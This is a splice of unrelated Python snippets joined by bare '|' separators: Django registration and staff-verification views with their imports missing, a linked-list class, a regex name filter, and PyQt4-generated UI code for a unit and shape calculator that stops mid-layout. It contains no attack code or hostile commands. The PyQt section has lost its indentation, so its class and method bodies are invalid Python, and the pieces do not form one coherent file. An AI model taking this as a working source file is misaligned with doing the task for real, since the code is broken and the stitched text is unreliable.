# from activities.models import Request
# Create your views here.
def register(request):
    """Render the student registration form; create the user on a valid POST."""
    form = UserRegistrationForm()
    if request.method == 'POST':
        form = UserRegistrationForm(request.POST or None)
        if form.is_valid():
            form.save()
            return redirect('login')
    # Re-render (with errors on invalid POST) or show the empty form on GET.
    return render(request, 'registration/register.html',
                  context={'form': form, 'title': 'Student'})
class TeacherSignUpView(CreateView):
    """Sign-up view for staff/teacher accounts.

    New teachers are NOT logged in after registration; they must first be
    verified (see the message below), so form_valid only saves and redirects.
    """
    form_class = TeacherSignUpForm
    model = User
    template_name = 'registration/register.html'

    def form_valid(self, form):
        form.save()
        # BUG FIX: the original implicit string concatenation produced
        # "you'reVerified" (missing space) and said "set" instead of "sent".
        message = ("registration successful, please note that you won't be able "
                   "to login to our site until you're verified. Kindly follow "
                   "the instructions sent to your email address")
        messages.success(self.request, message=message)
        return redirect('homepage')

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context['title'] = 'Staff'
        return context
class StaffVerificationView(CreateView, DetailView):
    """Shows a staff member's verification page and accepts their uploads."""
    form_class = StaffVerificationForm
    model = Staff
    template_name = 'registration/staff_verify.html'

    def form_valid(self, form):
        # Persist the verification items against the staff member being viewed.
        staff = self.get_object()
        form.save(staff)
        return redirect('homepage')

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context["staff"] = self.get_object()
        return context

    def post(self, request, *args: str, **kwargs):
        form = StaffVerificationForm(request.POST, request.FILES)
        staff = self.get_object()
        if form.is_valid():
            form.save(staff=staff)
            message = "verification items uploaded successfully, we will contact the admin to verify your account"\
                ". Thank you!"
            messages.success(request, message)
            return redirect("homepage")
        # BUG FIX: the original fell off the end (returned None) when the form
        # was invalid, causing Django's "view didn't return an HttpResponse"
        # error. Re-render the page so the user sees the form errors.
        return render(request, self.template_name,
                      context={'form': form, 'staff': staff})
@login_required
def profile(request):
    """Show the logged-in user's transcript requests on their profile page."""
    # All transcript requests made by the currently logged-in user.
    user_transcripts = Transcript.objects.filter(request_by=request.user)
    return render(request, 'profile.html', context={
        'specific': user_transcripts,
        'academic_office_staff': check_academicgroup_staff(request),
    })
@login_required
def upload_staff_signature(request):
    """Let a staff member upload their signature; non-staff users are turned away."""
    if not request.user.is_teacher:
        messages.info(request, "Only staffs are allowed to view this page.")
        return redirect(reverse('login'))

    form = StaffSignatureUpload(current_user=request.user)
    if request.method == "POST":
        form = StaffSignatureUpload(request.POST or None, request.FILES,
                                    current_user=request.user)
        if form.is_valid():
            form.save(commit=True)
            messages.success(request, "signature uploaded successfully")
            return redirect(reverse('user-profile'))

    return render(request, 'profile/signature.html', context=dict(form=form))
|
class Node:
    """A singly-linked-list node holding a value and a link to the next node."""

    def __init__(self, data):
        """Store the payload; a new node starts with no successor."""
        self.val = data      # the stored data
        self.next = None     # reference to the next node (None = end of list)
        # FIX: dropped the redundant bare `return` the original had here.

    def has_value(self, value):
        """Return True if this node's payload equals ``value``."""
        # FIX: collapsed the verbose `if ...: return True else: return False`.
        return self.val == value
# A Linked List class with a single head node
class LinkedList:
    """A minimal singly linked list supporting tail-append and printing."""

    def __init__(self):
        self.head = None

    # insertion method for the linked list
    def insert(self, data):
        """Append ``data`` at the tail (O(n) walk from the head)."""
        new_node = Node(data)
        if not self.head:
            # Empty list: the new node becomes the head.
            self.head = new_node
            return
        current = self.head
        while current.next:
            current = current.next
        current.next = new_node

    # print method for the linked list
    def printLL(self):
        """Print every stored value, head to tail, as one Python list."""
        # FIX: renamed the accumulator; the original shadowed the builtin `list`.
        values = []
        current = self.head
        while current:
            values.append(current.val)
            current = current.next
        print(values)
|
import re

nombres = ["Sandra López", "Antonio Gómez", "María López",
           "Jara Martín", "Lara Pérez"]

# FIX: use a plain loop instead of a list comprehension run purely for its
# side effect (the original built and discarded a list of None values).
for nombre in nombres:
    # Matches names that BEGIN with any character followed by "ara"
    # (re.match anchors at the start): "Jara ...", "Lara ...".
    if re.match(".ara", nombre):
        print(nombre)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\paul\Dropbox\Python\projects\Shape_Calculator\application\pyqt_ui\uiFormTabs.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
# Compatibility shim from the PyQt4 UI generator: older PyQt4 exposes
# QString.fromUtf8; newer API-v2 builds (and Python 3) have no QString,
# so strings pass through unchanged.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        # Strings are already unicode on this PyQt build.
        return s
# Compatibility shim from the PyQt4 UI generator: older PyQt4 takes an
# explicit encoding argument in QApplication.translate; newer builds
# dropped it, so fall back to the 3-argument form.
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(458, 630)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
MainWindow.setFont(font)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8("images/scLogolARGE.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.horizontalLayout_14 = QtGui.QHBoxLayout()
self.horizontalLayout_14.setObjectName(_fromUtf8("horizontalLayout_14"))
self.label = QtGui.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.label.setObjectName(_fromUtf8("label"))
self.horizontalLayout_14.addWidget(self.label)
self.btnReset = QtGui.QPushButton(self.centralwidget)
self.btnReset.setMaximumSize(QtCore.QSize(150, 16777215))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(9)
self.btnReset.setFont(font)
self.btnReset.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.btnReset.setObjectName(_fromUtf8("btnReset"))
self.horizontalLayout_14.addWidget(self.btnReset)
self.verticalLayout.addLayout(self.horizontalLayout_14)
self.btnConversions = QtGui.QTabWidget(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(9)
self.btnConversions.setFont(font)
self.btnConversions.setLayoutDirection(QtCore.Qt.LeftToRight)
self.btnConversions.setTabPosition(QtGui.QTabWidget.North)
self.btnConversions.setTabShape(QtGui.QTabWidget.Rounded)
self.btnConversions.setElideMode(QtCore.Qt.ElideNone)
self.btnConversions.setObjectName(_fromUtf8("btnConversions"))
self.tabUnitConversion = QtGui.QWidget()
self.tabUnitConversion.setObjectName(_fromUtf8("tabUnitConversion"))
self.verticalLayout_6 = QtGui.QVBoxLayout(self.tabUnitConversion)
self.verticalLayout_6.setObjectName(_fromUtf8("verticalLayout_6"))
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.labelTitleConversion = QtGui.QLabel(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(14)
self.labelTitleConversion.setFont(font)
self.labelTitleConversion.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTitleConversion.setObjectName(_fromUtf8("labelTitleConversion"))
self.horizontalLayout_2.addWidget(self.labelTitleConversion)
self.verticalLayout_6.addLayout(self.horizontalLayout_2)
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.labelTitleTo = QtGui.QLabel(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(8)
self.labelTitleTo.setFont(font)
self.labelTitleTo.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTitleTo.setObjectName(_fromUtf8("labelTitleTo"))
self.gridLayout.addWidget(self.labelTitleTo, 0, 2, 1, 1)
self.labelTitleFrom = QtGui.QLabel(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(8)
self.labelTitleFrom.setFont(font)
self.labelTitleFrom.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTitleFrom.setObjectName(_fromUtf8("labelTitleFrom"))
self.gridLayout.addWidget(self.labelTitleFrom, 0, 1, 1, 1)
self.lineEditOutputVolume = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputVolume.setFont(font)
self.lineEditOutputVolume.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputVolume.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputVolume.setReadOnly(True)
self.lineEditOutputVolume.setObjectName(_fromUtf8("lineEditOutputVolume"))
self.gridLayout.addWidget(self.lineEditOutputVolume, 6, 3, 1, 1)
self.labelTitleVolume = QtGui.QLabel(self.tabUnitConversion)
self.labelTitleVolume.setObjectName(_fromUtf8("labelTitleVolume"))
self.gridLayout.addWidget(self.labelTitleVolume, 5, 0, 2, 1)
self.label_3 = QtGui.QLabel(self.tabUnitConversion)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 7, 0, 2, 1)
self.lineEditInputMassFlow = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputMassFlow.setFont(font)
self.lineEditInputMassFlow.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputMassFlow.setObjectName(_fromUtf8("lineEditInputMassFlow"))
self.gridLayout.addWidget(self.lineEditInputMassFlow, 11, 3, 1, 1)
self.lineEditOutputArea = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputArea.setFont(font)
self.lineEditOutputArea.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputArea.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputArea.setReadOnly(True)
self.lineEditOutputArea.setObjectName(_fromUtf8("lineEditOutputArea"))
self.gridLayout.addWidget(self.lineEditOutputArea, 4, 3, 1, 1)
self.lineEditOutputLength = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputLength.setFont(font)
self.lineEditOutputLength.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputLength.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputLength.setReadOnly(True)
self.lineEditOutputLength.setObjectName(_fromUtf8("lineEditOutputLength"))
self.gridLayout.addWidget(self.lineEditOutputLength, 2, 3, 1, 1)
self.lineEditInputArea = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputArea.setFont(font)
self.lineEditInputArea.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputArea.setObjectName(_fromUtf8("lineEditInputArea"))
self.gridLayout.addWidget(self.lineEditInputArea, 3, 3, 1, 1)
self.lineEditOutputMassFlow = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputMassFlow.setFont(font)
self.lineEditOutputMassFlow.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputMassFlow.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputMassFlow.setReadOnly(True)
self.lineEditOutputMassFlow.setObjectName(_fromUtf8("lineEditOutputMassFlow"))
self.gridLayout.addWidget(self.lineEditOutputMassFlow, 12, 3, 1, 1)
self.lineEditInputDensity = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputDensity.setFont(font)
self.lineEditInputDensity.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputDensity.setObjectName(_fromUtf8("lineEditInputDensity"))
self.gridLayout.addWidget(self.lineEditInputDensity, 9, 3, 1, 1)
self.lineEditOutputDensity = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputDensity.setFont(font)
self.lineEditOutputDensity.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputDensity.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputDensity.setReadOnly(True)
self.lineEditOutputDensity.setObjectName(_fromUtf8("lineEditOutputDensity"))
self.gridLayout.addWidget(self.lineEditOutputDensity, 10, 3, 1, 1)
self.lineEditInputVolume = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputVolume.setFont(font)
self.lineEditInputVolume.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputVolume.setObjectName(_fromUtf8("lineEditInputVolume"))
self.gridLayout.addWidget(self.lineEditInputVolume, 5, 3, 1, 1)
self.lineEditInputMass = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputMass.setFont(font)
self.lineEditInputMass.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputMass.setObjectName(_fromUtf8("lineEditInputMass"))
self.gridLayout.addWidget(self.lineEditInputMass, 7, 3, 1, 1)
self.labelTitleVelocity = QtGui.QLabel(self.tabUnitConversion)
self.labelTitleVelocity.setObjectName(_fromUtf8("labelTitleVelocity"))
self.gridLayout.addWidget(self.labelTitleVelocity, 11, 0, 2, 1)
self.label_4 = QtGui.QLabel(self.tabUnitConversion)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout.addWidget(self.label_4, 9, 0, 2, 1)
self.labelTitleLength = QtGui.QLabel(self.tabUnitConversion)
self.labelTitleLength.setObjectName(_fromUtf8("labelTitleLength"))
self.gridLayout.addWidget(self.labelTitleLength, 1, 0, 2, 1)
self.labelTitleArea = QtGui.QLabel(self.tabUnitConversion)
self.labelTitleArea.setObjectName(_fromUtf8("labelTitleArea"))
self.gridLayout.addWidget(self.labelTitleArea, 3, 0, 2, 1)
self.lineEditOutputMass = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputMass.setFont(font)
self.lineEditOutputMass.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputMass.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputMass.setReadOnly(True)
self.lineEditOutputMass.setObjectName(_fromUtf8("lineEditOutputMass"))
self.gridLayout.addWidget(self.lineEditOutputMass, 8, 3, 1, 1)
self.lineEditInputLength = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputLength.setFont(font)
self.lineEditInputLength.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputLength.setObjectName(_fromUtf8("lineEditInputLength"))
self.gridLayout.addWidget(self.lineEditInputLength, 1, 3, 1, 1)
self.comboBoxFromLength = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromLength.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromLength.setFont(font)
self.comboBoxFromLength.setObjectName(_fromUtf8("comboBoxFromLength"))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromLength, 1, 1, 2, 1)
self.comboBoxToLength = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToLength.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToLength.setFont(font)
self.comboBoxToLength.setObjectName(_fromUtf8("comboBoxToLength"))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToLength, 1, 2, 2, 1)
self.comboBoxFromArea = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromArea.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromArea.setFont(font)
self.comboBoxFromArea.setObjectName(_fromUtf8("comboBoxFromArea"))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromArea, 3, 1, 2, 1)
self.comboBoxToLength_2 = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToLength_2.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToLength_2.setFont(font)
self.comboBoxToLength_2.setObjectName(_fromUtf8("comboBoxToLength_2"))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToLength_2, 3, 2, 2, 1)
self.comboBoxFromVolume = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromVolume.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromVolume.setFont(font)
self.comboBoxFromVolume.setObjectName(_fromUtf8("comboBoxFromVolume"))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromVolume, 5, 1, 2, 1)
self.comboBoxToVolume = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToVolume.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToVolume.setFont(font)
self.comboBoxToVolume.setObjectName(_fromUtf8("comboBoxToVolume"))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToVolume, 5, 2, 2, 1)
self.comboBoxFromMass = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromMass.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromMass.setFont(font)
self.comboBoxFromMass.setObjectName(_fromUtf8("comboBoxFromMass"))
self.comboBoxFromMass.addItem(_fromUtf8(""))
self.comboBoxFromMass.addItem(_fromUtf8(""))
self.comboBoxFromMass.addItem(_fromUtf8(""))
self.comboBoxFromMass.addItem(_fromUtf8(""))
self.comboBoxFromMass.addItem(_fromUtf8(""))
self.comboBoxFromMass.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromMass, 7, 1, 2, 1)
self.comboBoxToMass = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToMass.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToMass.setFont(font)
self.comboBoxToMass.setObjectName(_fromUtf8("comboBoxToMass"))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.comboBoxToMass.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToMass, 7, 2, 2, 1)
self.comboBoxFromDensity = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromDensity.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromDensity.setFont(font)
self.comboBoxFromDensity.setObjectName(_fromUtf8("comboBoxFromDensity"))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.comboBoxFromDensity.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromDensity, 9, 1, 2, 1)
self.comboBoxToDensity = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToDensity.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToDensity.setFont(font)
self.comboBoxToDensity.setObjectName(_fromUtf8("comboBoxToDensity"))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.comboBoxToDensity.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToDensity, 9, 2, 2, 1)
self.comboBoxFromMassFlow = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromMassFlow.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromMassFlow.setFont(font)
self.comboBoxFromMassFlow.setObjectName(_fromUtf8("comboBoxFromMassFlow"))
self.comboBoxFromMassFlow.addItem(_fromUtf8(""))
self.comboBoxFromMassFlow.addItem(_fromUtf8(""))
self.comboBoxFromMassFlow.addItem(_fromUtf8(""))
self.comboBoxFromMassFlow.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromMassFlow, 11, 1, 2, 1)
self.comboBoxToMassFlow = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToMassFlow.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToMassFlow.setFont(font)
self.comboBoxToMassFlow.setObjectName(_fromUtf8("comboBoxToMassFlow"))
self.comboBoxToMassFlow.addItem(_fromUtf8(""))
self.comboBoxToMassFlow.addItem(_fromUtf8(""))
self.comboBoxToMassFlow.addItem(_fromUtf8(""))
self.comboBoxToMassFlow.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToMassFlow, 11, 2, 2, 1)
self.verticalLayout_6.addLayout(self.gridLayout)
self.horizontalLayout_13 = QtGui.QHBoxLayout()
self.horizontalLayout_13.setObjectName(_fromUtf8("horizontalLayout_13"))
spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_13.addItem(spacerItem)
self.btnConvert = QtGui.QPushButton(self.tabUnitConversion)
self.btnConvert.setMinimumSize(QtCore.QSize(200, 0))
self.btnConvert.setMaximumSize(QtCore.QSize(200, 16777215))
font = QtGui.QFont()
font.setPointSize(9)
self.btnConvert.setFont(font)
self.btnConvert.setObjectName(_fromUtf8("btnConvert"))
self.horizontalLayout_13.addWidget(self.btnConvert)
self.verticalLayout_6.addLayout(self.horizontalLayout_13)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_6.addItem(spacerItem1)
self.btnConversions.addTab(self.tabUnitConversion, _fromUtf8(""))
self.tabCircles = QtGui.QWidget()
self.tabCircles.setObjectName(_fromUtf8("tabCircles"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.tabCircles)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.labelCircleTitle = QtGui.QLabel(self.tabCircles)
font = QtGui.QFont()
font.setPointSize(14)
font.setUnderline(False)
self.labelCircleTitle.setFont(font)
self.labelCircleTitle.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelCircleTitle.setObjectName(_fromUtf8("labelCircleTitle"))
self.verticalLayout_3.addWidget(self.labelCircleTitle)
self.labelInputCircle = QtGui.QLabel(self.tabCircles)
font = QtGui.QFont()
font.setPointSize(9)
self.labelInputCircle.setFont(font)
self.labelInputCircle.setObjectName(_fromUtf8("labelInputCircle"))
self.verticalLayout_3.addWidget(self.labelInputCircle)
self.formLayout_2 = QtGui.QFormLayout()
self.formLayout_2.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout_2.setLabelAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.formLayout_2.setObjectName(_fromUtf8("formLayout_2"))
self.labelDiameter = QtGui.QLabel(self.tabCircles)
self.labelDiameter.setMinimumSize(QtCore.QSize(250, 0))
self.labelDiameter.setObjectName(_fromUtf8("labelDiameter"))
self.formLayout_2.setWidget(0, QtGui.QFormLayout.LabelRole, self.labelDiameter)
self.txtCLS_Diamter = QtGui.QLineEdit(self.tabCircles)
font = QtGui.QFont()
font.setPointSize(11)
self.txtCLS_Diamter.setFont(font)
self.txtCLS_Diamter.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtCLS_Diamter.setObjectName(_fromUtf8("txtCLS_Diamter"))
self.formLayout_2.setWidget(0, QtGui.QFormLayout.FieldRole, self.txtCLS_Diamter)
self.labelArea = QtGui.QLabel(self.tabCircles)
self.labelArea.setLayoutDirection(QtCore.Qt.LeftToRight)
self.labelArea.setObjectName(_fromUtf8("labelArea"))
self.formLayout_2.setWidget(1, QtGui.QFormLayout.LabelRole, self.labelArea)
self.txtCLS_Area = QtGui.QLineEdit(self.tabCircles)
font = QtGui.QFont()
font.setPointSize(11)
self.txtCLS_Area.setFont(font)
self.txtCLS_Area.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtCLS_Area.setObjectName(_fromUtf8("txtCLS_Area"))
self.formLayout_2.setWidget(1, QtGui.QFormLayout.FieldRole, self.txtCLS_Area)
self.labelCircumference = QtGui.QLabel(self.tabCircles)
self.labelCircumference.setObjectName(_fromUtf8("labelCircumference"))
self.formLayout_2.setWidget(2, QtGui.QFormLayout.LabelRole, self.labelCircumference)
self.txtCLS_Circumference = QtGui.QLineEdit(self.tabCircles)
font = QtGui.QFont()
font.setPointSize(11)
self.txtCLS_Circumference.setFont(font)
self.txtCLS_Circumference.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtCLS_Circumference.setObjectName(_fromUtf8("txtCLS_Circumference"))
self.formLayout_2.setWidget(2, QtGui.QFormLayout.FieldRole, self.txtCLS_Circumference)
self.verticalLayout_3.addLayout(self.formLayout_2)
self.horizontalLayout_11 = QtGui.QHBoxLayout()
self.horizontalLayout_11.setObjectName(_fromUtf8("horizontalLayout_11"))
